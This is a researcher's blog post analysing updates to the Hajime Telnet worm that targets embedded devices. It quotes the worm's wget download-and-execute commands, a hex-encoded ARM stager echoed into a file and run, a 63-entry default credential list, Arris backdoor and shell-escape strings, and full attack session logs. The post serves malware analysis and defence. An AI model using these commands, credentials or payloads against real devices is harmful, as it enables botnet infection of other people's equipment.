github twitter email rss
Hajime: A follow-up
Apr 15, 2017
5 minutes read

Hajime is a decentralized modular worm that targets embedded devices with Telnet exposed to the internet.

Its binaries are built for Linux devices with ARMv5, ARMv6, ARMv7, MIPS little-endian and MIPS big-endian processor architectures.

It was originally discovered by Sam Edwards and I of Rapidity Networks SRG, and its behaviour was outlined in a paper that can be found here.

Ever since the release of the aforementioned paper on October 16th of 2016, there has been a series of changes as to how Hajime operates.

  • The atk module now checks for the presence of wget and uses it in place of its own stager if available. It checks whether wget exists by running the following command:
nc; wget; /bin/busybox UXVMW

And checking its output for the strings “wget: applet not found” or “wget: not found”.

The request URI is always /.i:

rm .s; wget http://x.x.x.x:10363/.i; chmod +x .i; ./.i; exit
  • Similarly, the atk module (formerly named exp) now also features a minimal HTTP web server for spreading stage2s, listening on an unprivileged random port (>= 1024). It serves the stage2 corresponding to the architecture of the device that it is infecting regardless of the request URI, as long as the request method is GET. The response is as follows:
HTTP/1.0 200 OK
Content-Type: application/octet-stream
Content-Length: *size of stage2*


*payload*
  • The atk module now attempts to port-forward the ports it uses to spread through the use of UPnP’s AddPortMapping SOAP command.
  • Complete overhaul of the scanning/attack logic.
  • The atk module now selects a random 5-letter uppercase alphabetic string as the BusyBox applet name for its command output delimiter (formerly “ECCHI”).
  • The atk module is now capable of infecting ARRIS modems by using the password-of-the-day “backdoor” with the default seed (outlined here: https://w00tsec.blogspot.com/2015/11/arris-cable-modem-has-backdoor-in.html). It does so by checking for the Arris telnet banner upon connection.
  • Upon successful login, Hajime now tries a variety of shell escape vulnerabilities to attempt to drop out of any potential restricted shells. On non-Arris devices, the attempted commands are (in respective order):
enable
shell
sh

On Arris devices, the attempted commands are (in respective order):

system
ping ; sh

The latter has also been observed to be in use by LuaBot (see here: https://w00tsec.blogspot.com/2016/09/luabot-malware-targeting-cable-modems.html)

  • The atk module now has a significantly larger table of credentials (formerly 12 combinations, now 63):
Username Password
root xc3511
root vizxv
root admin
admin admin
root 888888
root xmhdipc
root default
root juantech
root 123456
root 54321
support support
root
admin password
root root
root 12345
user user
admin
root pass
admin admin1234
root 1111
admin smcadmin
admin 1111
root 666666
root password
root 1234
root klv123
Administrator admin
service service
supervisor supervisor
guest guest
guest 12345
admin1 password
administrator 1234
666666 666666
888888 888888
ubnt ubnt
root klv1234
root Zte521
root hi3518
root jvbzd
root anko
root zlxx.
root 7ujMko0vizxv
root 7ujMko0admin
root system
root ikwb
root dreambox
root user
root realtek
root 00000000
admin 1111111
admin 1234
admin 12345
admin 54321
admin 123456
admin 7ujMko0admin
admin 1234
admin pass
admin meinsm
tech tech
mother fucker
root 5up
Admin 5up
  • Upon its startup, the stage2 now attempts to block a series of ports on the infected device through the use of iptables:
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 7547 -j DROP
iptables -A INPUT -p tcp --destination-port 5555 -j DROP
iptables -A INPUT -p tcp --destination-port 5358 -j DROP

It also attempts to drop an INPUT chain named “CWMP_CR”:

iptables -D INPUT -j CWMP_CR
iptables -X CWMP_CR
  • The public/private keys as well as the RC4 key derived by the key exchange are no longer static, as the misuse of C’s rand function has since been fixed by the author.
  • Config files can now contain a new section, [info], containing messages from the author. The string under that section is printed to the standard output, and appears to be aimed at researchers that are debugging Hajime.
  • The info section of the current config as of April 13 2017 is as follows (stripped of ANSI escape codes):
Just a white hat, securing some systems.

Important messages will be signed like this!

Hajime Author.

Contact CLOSED

Stay sharp!
  • Example Hajime attack session (Arris banner, ARMv7 platform, no wget available):
1G3IL4R495
system
ping ; sh
cat /proc/mounts; /bin/busybox PSLQP
cd /var; (cat .s || cp /bin/echo .s); /bin/busybox PSLQP
nc; wget; /bin/busybox PSLQP
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PSLQP
>.s; cp .s .i
echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x54\x00\x01\x00\x34\x00\x00\x00\x40\x01\x00\x00\x00\x02\x00\x05\x34\x00\x20\x00\x01\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" >> .s
echo -ne "\x00\x00\x01\x00\xf8\x00\x00\x00\xf8\x00\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x70\x10\x8f\xe2\x10\x20\xa0\xe3" >> .s
echo -ne "\x07\x00\x2d\xe9\x03\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x4f\x4f\x4d\xe2\x05\x50\x45\xe0\x06\x00\xa0\xe1\x04\x10\xa0\xe1\x4b\x2f\xa0\xe3\x01\x3c\xa0\xe3\x0f\x00\x2d\xe9\x0a\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x10\xd0\x8d\xe2" >> .s
echo -ne "\x00\x50\x85\xe0\x00\x00\x50\xe3\x04\x00\x00\xda\x00\x20\xa0\xe1\x01\x00\xa0\xe3\x04\x10\xa0\xe1\x04\x00\x90\xef\xee\xff\xff\xea\x4f\xdf\x8d\xe2\x00\x00\x40\xe0\x01\x70\xa0\xe3\x00\x00\x00\xef\x02\x00\x9f\xc8\x05\x28\xcf\x1d\x41\x26\x00\x00\x00\x61\x65\x61" >> .s
echo -ne "\x62\x69\x00\x01\x1c\x00\x00\x00\x05\x43\x6f\x72\x74\x65\x78\x2d\x41\x35\x00\x06\x0a\x07\x41\x08\x01\x09\x02\x2a\x01\x44\x01\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x54\x00\x01\x00\x54\x00\x00\x00\xa4\x00\x00\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x01\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s
./.s>.i; chmod +x .i; ./.i; rm .s; exit
  • Example Hajime attack session (Arris banner, ARMv7 platform, wget available):
1G3IL4R495
system
ping ; sh
cat /proc/mounts; /bin/busybox UXVMW
cd /var; (cat .s || cp /bin/echo .s); /bin/busybox UXVMW
nc; wget; /bin/busybox UXVMW
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox UXVMW
rm .s; wget http://x.x.x.x:10363/.i; chmod +x .i; ./.i; exit

Note that the first line on both sessions is the Arris password-of-the-day for April 13th, 2017.

  • The above research was conducted through the analysis of the following Hajime samples:
File name: .i.arm7.1485239580
Hashes:
MD5:		2e9dd2e43e866a26c44ceccc129e0c52
SHA1:		c2b82c322cfd0f61d234267a99bb848898fe54ea
SHA256:		e3a4120c1f2ec3d430ad95f567179280d657739dd906053d0e9b6d45d59ffa93
SHA512:		74e160a752517fcc28c49efbb326689197d2b2f7bd7c365aaaed511c2e9565c90509b61520b9a117bafae24f653ca62e6b686c51d464ce2b77e8be2b4a5217a6

File name: atk.arm7.1485239515
Hashes:
MD5:		359779e208d59d84a9b58a278be5345b
SHA1:		14ac6ea9736ae013071995dff535c34ebb411143
SHA256:		c02cb27fee760a29d990cecfb029b64aa2abbc349fa2a9c17b2438add3af4da0
SHA512:		9e4e8be435613f08380d057e4d0cf0532308c69e82fe9fe9c951d47b65ac4166db83cafe043617d474fb07b9d1b43c3ac08c9db3ebb8d0bcb8688d96181b1faf

A repository containing the filenames and hashes of all known Hajime configurations and binaries can be found at https://github.com/Psychotropos/hajime_hashes.

Samples are also automatically submitted to VirusTotal for analysis: https://www.virustotal.com/en/user/psychotropos/


Back to posts